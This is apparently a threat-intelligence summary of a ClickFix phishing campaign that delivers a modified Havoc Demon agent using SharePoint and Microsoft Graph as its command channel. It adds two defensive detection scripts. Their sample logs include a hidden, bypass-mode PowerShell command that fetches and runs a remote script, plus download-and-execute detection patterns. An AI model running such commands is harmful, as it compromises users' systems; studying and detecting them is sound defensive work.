Introduction
A sophisticated cyberattack campaign has been identified, targeting Microsoft Windows users through social engineering [3] [5], multi-stage malware [1] [3] [5], and manipulation of trusted cloud services [3]. This campaign leverages a modified version of the Havoc command-and-control (C2) framework, known as the Havoc Demon Agent [3] [5], to gain control over compromised systems by embedding malicious communications within legitimate cloud traffic.
Description
A new cyberattack campaign targeting Microsoft Windows users has been identified, utilizing social engineering [3] [5] [7], multi-stage malware [1] [3] [5], and manipulation of trusted cloud services to gain control over compromised systems [5]. This campaign employs a modified version of the open-source Havoc command-and-control (C2) framework, known as the Havoc Demon Agent [3] [5], which conceals malicious communications within legitimate cloud traffic by leveraging the Microsoft Graph API and SharePoint functions. The threat actor utilizes a phishing technique, specifically the ClickFix method, to deceive users into executing a harmful PowerShell command [3] [4] [5] [7], embedding each stage of the malware within SharePoint environments to obscure C2 communications.
The attack begins with a phishing email containing an HTML attachment designed to trick recipients into executing a PowerShell command by presenting them with a fake error page. This command initiates a series of events [3] [5], downloading a remote PowerShell script from a SharePoint-hosted URL that first checks for sandbox environments [7]. If the script determines that the system is not sandboxed, it alters system registry entries to create infection markers and loads a Python interpreter to run a script that functions as a KaynLdr malware loader. The initial PowerShell script then downloads this Python script, which acts as a shellcode loader [3] [5], injecting and executing a malicious DLL called KaynLdr [3] [5], which is designed to evade sandbox detection [5].
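The infection chain above leaves a recognisable footprint in PowerShell Script Block Logging (Event ID 4104): a script fetched from a SharePoint URL and piped straight into the interpreter, hidden-window or execution-policy switches, a registry write used as an infection marker, and a Python interpreter being launched. The following detection sketch is an added example written for this summary; it is not code from the report or from any of the cited sources. The 4104 records, the host and user names, the tenant name and the registry path are constructed placeholders, and the indicator weights and thresholds are assumptions to be tuned against local baselines.

```python
import re
from collections import defaultdict

# Constructed sample of PowerShell Script Block Logging records (Event ID 4104),
# reduced to (record_id, host, user, script_text). These are illustrative lines,
# not telemetry from the campaign; the tenant name and registry path are placeholders.
SAMPLE_4104 = [
    (1, "WS01", "alice", r"Get-ChildItem C:\Reports | Sort-Object LastWriteTime"),
    (2, "WS01", "alice",
     'powershell -w hidden -ep bypass -c "irm https://TENANT-PLACEHOLDER.sharepoint.com/sites/s/stage1.ps1 | iex"'),
    (3, "WS02", "bob", "Invoke-WebRequest https://updates.example.com/tool.zip -OutFile tool.zip"),
    (4, "WS01", "alice",
     r'New-ItemProperty -Path HKCU:\Software\MarkerPlaceholder -Name Installed -Value 1; '
     r'& "$env:LOCALAPPDATA\python\python.exe" "$env:TEMP\loader.py"'),
]

# Each indicator mirrors one step the report describes: a script fetched from a
# SharePoint URL, piped into the interpreter, hidden/bypass switches, a registry
# infection marker, and a Python interpreter being launched.
INDICATORS = {
    "sharepoint_fetch": re.compile(
        r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b[^;|\n]*sharepoint\.com", re.I),
    "remote_exec": re.compile(r"\|\s*(?:iex|Invoke-Expression)\b", re.I),
    "hidden_or_bypass": re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass)\b", re.I),
    "registry_marker": re.compile(r"\b(?:New|Set)-ItemProperty\b[^;|\n]*HKCU:|\breg(?:\.exe)?\s+add\b", re.I),
    "python_launch": re.compile(r"\bpython(?:3|w)?(?:\.exe)?\b", re.I),
}
# Assumed weights: the SharePoint download-and-execute pair carries most of the signal.
WEIGHTS = {"sharepoint_fetch": 3, "remote_exec": 2, "hidden_or_bypass": 2,
           "registry_marker": 1, "python_launch": 1}
BLOCK_THRESHOLD = 4   # one script block this suspicious is an alert on its own
CHAIN_THRESHOLD = 3   # or: this many distinct stages seen for the same host/user


def score_block(script_text):
    """Return (score, sorted indicator names) for a single script block."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script_text))
    return sum(WEIGHTS[h] for h in hits), hits


def detect_clickfix_chain(records):
    """Correlate 4104 records per host/user and return one alert dict per suspicious actor."""
    per_actor = defaultdict(lambda: {"record_ids": [], "indicators": set(), "max_block_score": 0})
    for rec_id, host, user, text in records:
        score, hits = score_block(text)
        if not hits:
            continue
        entry = per_actor[(host, user)]
        entry["record_ids"].append(rec_id)
        entry["indicators"].update(hits)
        entry["max_block_score"] = max(entry["max_block_score"], score)

    alerts = []
    for (host, user), e in sorted(per_actor.items()):
        # Either a single loud block, or several stages of the chain from one actor.
        if e["max_block_score"] >= BLOCK_THRESHOLD or len(e["indicators"]) >= CHAIN_THRESHOLD:
            alerts.append({"host": host, "user": user, "record_ids": e["record_ids"],
                           "indicators": sorted(e["indicators"]),
                           "max_block_score": e["max_block_score"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix_chain(SAMPLE_4104):
        print(alert)
```

Correlating across records matters because the ClickFix one-liner and the later registry-marker and Python stages arrive as separate script blocks; a per-block rule alone would miss an actor whose download stage was obfuscated but whose follow-on stages were not.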
The modified Havoc Demon DLL starts with a function called DemonInit [1], which uses a hash algorithm similar to KaynLdr's for API retrieval and configuration initialization [1]. A key function, "SharePointC2Init," obtains tokens for the Microsoft Graph API and creates files in the victim's SharePoint document library for encrypted data transmission and command reception. The initial communication to the C2 server is a CheckIn request that transmits victim information, such as Host Name [1], User Name [1] [6], Domain Name [1], IP Address [1] [2], OS Information [1], and account elevation status, encrypted with AES-256 in CTR mode [1]. By embedding command-and-control logic within Microsoft Graph API interactions [2], the attackers borrow the trust associated with SharePoint and Office 365 services [2], complicating detection efforts [2]. Using these tokens [1], the agent can transmit victim information and receive C2 commands, enabling a range of post-exploitation capabilities [5], including information gathering [1] [3] [5], file operations [1] [3] [5], command execution [1] [2] [3] [5] [7], token manipulation [1] [2] [3], and Kerberos attacks [1] [2].
If a Python interpreter is absent [7], the script installs one before executing the concealed shellcode loader [7]; the loader includes debug messages in Russian and is designed to execute shellcode in memory [7], enabling attackers to maintain persistence [7]. The TransportSend function has been modified to carry out C2 communication through specific files associated with the victim [1]: it writes each request to one file and retrieves responses from another using the Microsoft Graph API [1], with responses erased immediately to reduce forensic traces [2]. If the response matches the AgentID [1], the session is marked as connected [1], and the agent enters a dispatcher routine to await further commands [1]. While only the DEMONCOMMANDNO_JOB command (Command ID: 0xA) was observed [1], the framework supports over 50 commands [1], including file exfiltration [2], lateral movement [2], and Kerberos ticket manipulation [2], reflecting the capabilities found in Havoc's public repository [2].
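The file-pair transport described above is itself a detectable pattern: one source keeps writing to the same SharePoint drive item, immediately reads a second item, and the response item is removed right after each read, on a regular beacon interval. The script below is an added example, written for this summary and not taken from the report or the cited sources. It assumes a constructed proxy-style log of Graph requests (timestamp, source host, user agent, method, path, status); the site and item ids are placeholders, and mapping the described write/read/erase behaviour onto PUT, GET and DELETE requests against drive-item paths is an assumption about how it would surface in request logs.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy-style log of Microsoft Graph drive-item requests. Host names,
# site and item ids are placeholders; WS02 is a benign user opening two documents,
# WS01 shows the write-one-file / read-another / delete cycle every 60 seconds.
SAMPLE_LOG = """\
2025-03-01T10:00:00Z WS02 ua="Mozilla/5.0 Edge/122" GET /v1.0/sites/SITE-A/drive/items/ITEM-DOC1/content 200
2025-03-01T10:00:05Z WS01 ua="Mozilla/5.0" PUT /v1.0/sites/SITE-A/drive/items/ITEM-REQ/content 200
2025-03-01T10:00:06Z WS01 ua="Mozilla/5.0" GET /v1.0/sites/SITE-A/drive/items/ITEM-RSP/content 200
2025-03-01T10:00:07Z WS01 ua="Mozilla/5.0" DELETE /v1.0/sites/SITE-A/drive/items/ITEM-RSP 204
2025-03-01T10:00:30Z WS02 ua="Mozilla/5.0 Edge/122" GET /v1.0/sites/SITE-A/drive/items/ITEM-DOC2/content 200
2025-03-01T10:01:05Z WS01 ua="Mozilla/5.0" PUT /v1.0/sites/SITE-A/drive/items/ITEM-REQ/content 200
2025-03-01T10:01:06Z WS01 ua="Mozilla/5.0" GET /v1.0/sites/SITE-A/drive/items/ITEM-RSP/content 200
2025-03-01T10:01:07Z WS01 ua="Mozilla/5.0" DELETE /v1.0/sites/SITE-A/drive/items/ITEM-RSP 204
2025-03-01T10:02:05Z WS01 ua="Mozilla/5.0" PUT /v1.0/sites/SITE-A/drive/items/ITEM-REQ/content 200
2025-03-01T10:02:06Z WS01 ua="Mozilla/5.0" GET /v1.0/sites/SITE-A/drive/items/ITEM-RSP/content 200
2025-03-01T10:02:07Z WS01 ua="Mozilla/5.0" DELETE /v1.0/sites/SITE-A/drive/items/ITEM-RSP 204
"""

LINE_RX = re.compile(r'^(\S+) (\S+) ua="([^"]*)" (\w+) (\S+) (\d+)$')
ITEM_RX = re.compile(r"/items/([^/?]+)")  # drive-item id segment of a Graph path


def parse_events(log_text):
    """Turn log lines into (timestamp, source, method, item_id) tuples, oldest first."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RX.match(line.strip())
        if not m:
            continue
        ts, source, _ua, method, path, _status = m.groups()
        item = ITEM_RX.search(path)
        if not item:
            continue  # not a drive-item request
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), source, method.upper(), item.group(1)))
    return sorted(events)


def detect_file_pair_beacons(log_text, min_cycles=3):
    """Flag sources that repeatedly write one drive item and immediately read a different one."""
    by_source = defaultdict(list)
    for ts, source, method, item in parse_events(log_text):
        by_source[source].append((ts, method, item))

    # (source, request_item, response_item) -> cycle start times and deletions seen
    cycles = defaultdict(lambda: {"times": [], "deleted": 0})
    for source, seq in by_source.items():
        for i in range(len(seq) - 1):
            ts, method, item = seq[i]
            _, next_method, next_item = seq[i + 1]
            if method == "PUT" and next_method == "GET" and next_item != item:
                entry = cycles[(source, item, next_item)]
                entry["times"].append(ts)
                # The report notes responses are erased right away; count that when visible.
                if i + 2 < len(seq) and seq[i + 2][1] == "DELETE" and seq[i + 2][2] == next_item:
                    entry["deleted"] += 1

    alerts = []
    for (source, req_item, rsp_item), e in sorted(cycles.items()):
        if len(e["times"]) < min_cycles:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(e["times"], e["times"][1:])]
        avg = mean(gaps) if gaps else None
        alerts.append({
            "source": source, "request_item": req_item, "response_item": rsp_item,
            "cycles": len(e["times"]), "deleted_responses": e["deleted"],
            "mean_gap_s": avg,
            # Low jitter (stdev / mean) on the cycle interval is typical of a polling agent.
            "jitter_ratio": (pstdev(gaps) / avg) if avg else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_file_pair_beacons(SAMPLE_LOG):
        print(alert)
```

The cycle count and the jitter ratio together separate a polling agent from a user who happens to edit one document and open another; a real deployment would additionally weight the user agent and the process that holds the Graph token, neither of which this constructed log carries.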
Conclusion
To mitigate risks [1], users should exercise caution with phishing emails and with guided messages that prompt them to open a terminal or PowerShell [1], as these can lead to the execution of malicious commands [1] [5]. Organizations are advised to bolster their security measures by blocking automatic PowerShell script execution and thoroughly verifying the origins of email attachments [6]. The integration of the modified Havoc Demon with the Microsoft Graph API complicates the detection and identification of malicious activity within public services [1], highlighting the evolution of open-source C2 frameworks and the increasing complexity and sophistication of cyber threats. The campaign demonstrates a high level of sophistication [5] while requiring more manual action from victims than typical campaigns [5], which usually aim for minimal interaction [5].
References
[1] https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
[2] https://cybersecuritynews.com/clickfix-tactic-to-attack-windows-machine/
[3] https://ciso2ciso.com/new-malware-campaign-exploits-microsoft-graph-api-to-infect-windows-sourcehackread-com/
[4] https://thenimblenerd.com/article/phishing-frenzy-havoc-demon-uses-microsoft-graph-to-hijack-sharepoint-how-to-stay-safe/
[5] https://hackread.com/malware-exploits-microsoft-graph-api-infect-windows/
[6] https://hackyourmom.com/en/novyny/hakery-vykorystovuyut-tehniku-clickfix-dlya-rozpovsyudzhennya-havoc-c2-cherez-sajty-sharepoint/
[7] https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/